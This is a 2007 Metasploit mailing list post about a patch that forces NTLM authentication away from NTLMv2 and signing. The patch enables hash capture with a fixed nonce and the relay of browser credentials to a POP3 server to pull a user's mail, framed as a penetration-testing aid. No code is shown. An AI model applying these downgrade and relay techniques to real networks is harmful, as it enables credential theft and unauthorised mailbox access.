Metasploit mailing list archives
Windows Transparent Authentication updates
From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Fri, 16 Nov 2007 09:44:33 -0600
Yesterday I submitted ticket #169 to update the NTLMSSP type code support in proto/smb/ui.rb. It adds a function to force negotiation away from NTLMv2 and signing as well as use bitmasking. This now makes it possible to support things like NTLM hash capturing with a predefined nonce over HTTP, IMAP, POP3, or NNTP. I've not written any auxiliary/exploit modules for this yet mostly due to lack of time but I do have code available: http://grutz.jingojango.net/exploits/pokehashball.html I've also coded up a protocol proxy that will take the authentication messages from HTTP and relay them between a POP3 server to download all available mail for a user. It's very brute-force at the moment but it does work. If I get some time to complete the entire tool I have in my head it'll include HTTP and IMAP proxying and more intelligent support for holding on to the browser and requesting authentication at-will. Check out Rsnake's blog on an idea to use DNS Pinning to fake out IE's trust zone - http://ha.ckers.org/blog/20071112/effects-of-dns-rebinding-on-ies-trust-zones/ Very interesting theory but not sure it'll work that well given you need a very specific set of circumstances for transparent authentication to work in IE: 1. URL must be an internal IP address or hostname (no FQDN) 2. Server must send the correct domain workstation is a member of 3. Server must not be accessed via the proxy That kind of limits attacks from the Internet for a large majority of locations but doesn't make it impossible. I'm excited! If anyone has any activex code that could turn a browser into a usable proxy however... let me know. Half the battle with transparent auth is getting the browser to think it's talking to a "Trusted Intranet" computer. Having a machine on the inside is easiest so this attack is best served when you're on-site doing a penetration test. So, enjoy! If you want to give a hand on writing some usable modules or expanding the exitsing project let me know. -- ..:[ grutz at jingojango dot net ]:.. GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4 "There's just no amusing way to say, 'I have a CISSP'." -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 191 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071116/f14de553/attachment.pgp>
Current thread:
- Windows Transparent Authentication updates Kurt Grutzmacher (Nov 16)
- Windows Transparent Authentication updates Jonatan B (Nov 17)
- Windows Transparent Authentication updates Kurt Grutzmacher (Nov 17)
- Windows Transparent Authentication updates natronicus (Nov 19)
- Windows Transparent Authentication updates Kurt Grutzmacher (Nov 19)
- Windows Transparent Authentication updates Jonatan B (Nov 17)